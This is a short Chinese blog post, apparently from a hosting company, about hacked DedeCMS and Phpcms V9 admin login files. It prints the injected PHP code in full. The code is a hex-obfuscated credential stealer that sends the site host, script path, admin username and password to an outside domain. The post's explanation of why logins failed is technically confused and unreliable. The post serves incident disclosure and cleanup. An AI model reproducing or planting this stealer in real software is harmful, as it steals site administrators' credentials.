POST TIME:2017-11-30 16:50
之前發(fā)現(xiàn)一個(gè)服務(wù)器的所有網(wǎng)站都出現(xiàn)了后臺(tái)登陸不進(jìn)去的情況,本來以為是服務(wù)器內(nèi)存,cpu或者寬帶的原因,可是都很正常,為什么登陸不進(jìn)去呢?不程序下載到本地就正常了,真奇怪,最終找了一天終于找到了,原來是登陸文件讓黑客給修改了,原來是登陸用戶名密碼讓轉(zhuǎn)碼成16進(jìn)制數(shù)了,php解析不了,再本地系統(tǒng)有默認(rèn)的這個(gè)編碼表,當(dāng)然能解析了,所以正常;
織夢(mèng)網(wǎng)站:/include/userlogin.class.php
Phpcms V9:/phpcms/modules/admin/index.php
找個(gè)新文件替換下就可以了;
如下是攻擊代碼:
$sqlhost = "\x77\x77\x77\x2e\x74\x68\x69\x73\x64\x6f\x6f\x72\x2e\x63\x6f\x6d";
$sqlself = "\x2f\x69\x6e\x2f\x61\x70\x69\x2e\x70\x68\x70";
$sqlself .= "\x3f\x76\x61\x72\x3d\x64\x65\x64\x65\x26\x64\x61\x74\x61\x3d";
$sqlself .= bin2hex($_SERVER["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"]).'|'.bin2hex($_SERVER["\x50\x48\x50\x5f\x53\x45\x4c\x46"]).'|';
$sqlself .= bin2hex($username).'|'.bin2hex($userpwd);
$sqlport = hexdec(50);
if(function_exists("\x66\x73\x6f\x63\x6b\x6f\x70\x65\x6e")) {
$sqlfp = @fsockopen ($sqlhost, $sqlport);
@fputs ($sqlfp, "\x47\x45\x54\x20".$sqlself."\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\r\n\x48\x6f\x73\x74\x3a".$sqlhost."\r\n\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x43\x6c\x6f\x73\x65\r\n\r\n");
@fclose ($sqlfp);
} else {
$context = array("\x68\x74\x74\x70" => array("\x6d\x65\x74\x68\x6f\x64" => "\x47\x45\x54","\x74\x69\x6d\x65\x6f\x75\x74" => 5));
if(function_exists('stream_context_create')) { $stream = @stream_context_create ($context); }
@file_get_contents ("\x68\x74\x74\x70\x3a\x2f\x2f".$sqlhost."\x3a".$sqlport.$sqlself, false, $stream);
}
| ? |
|
|
|
|||||||||||||||
| 全國咨詢熱線 | |||||||||||||||||
| 400-1100-266 | |||||||||||||||||
| 在線客服( QQ:340506921 ) | |||||||||||||||||
 |
|||||||||||||||||
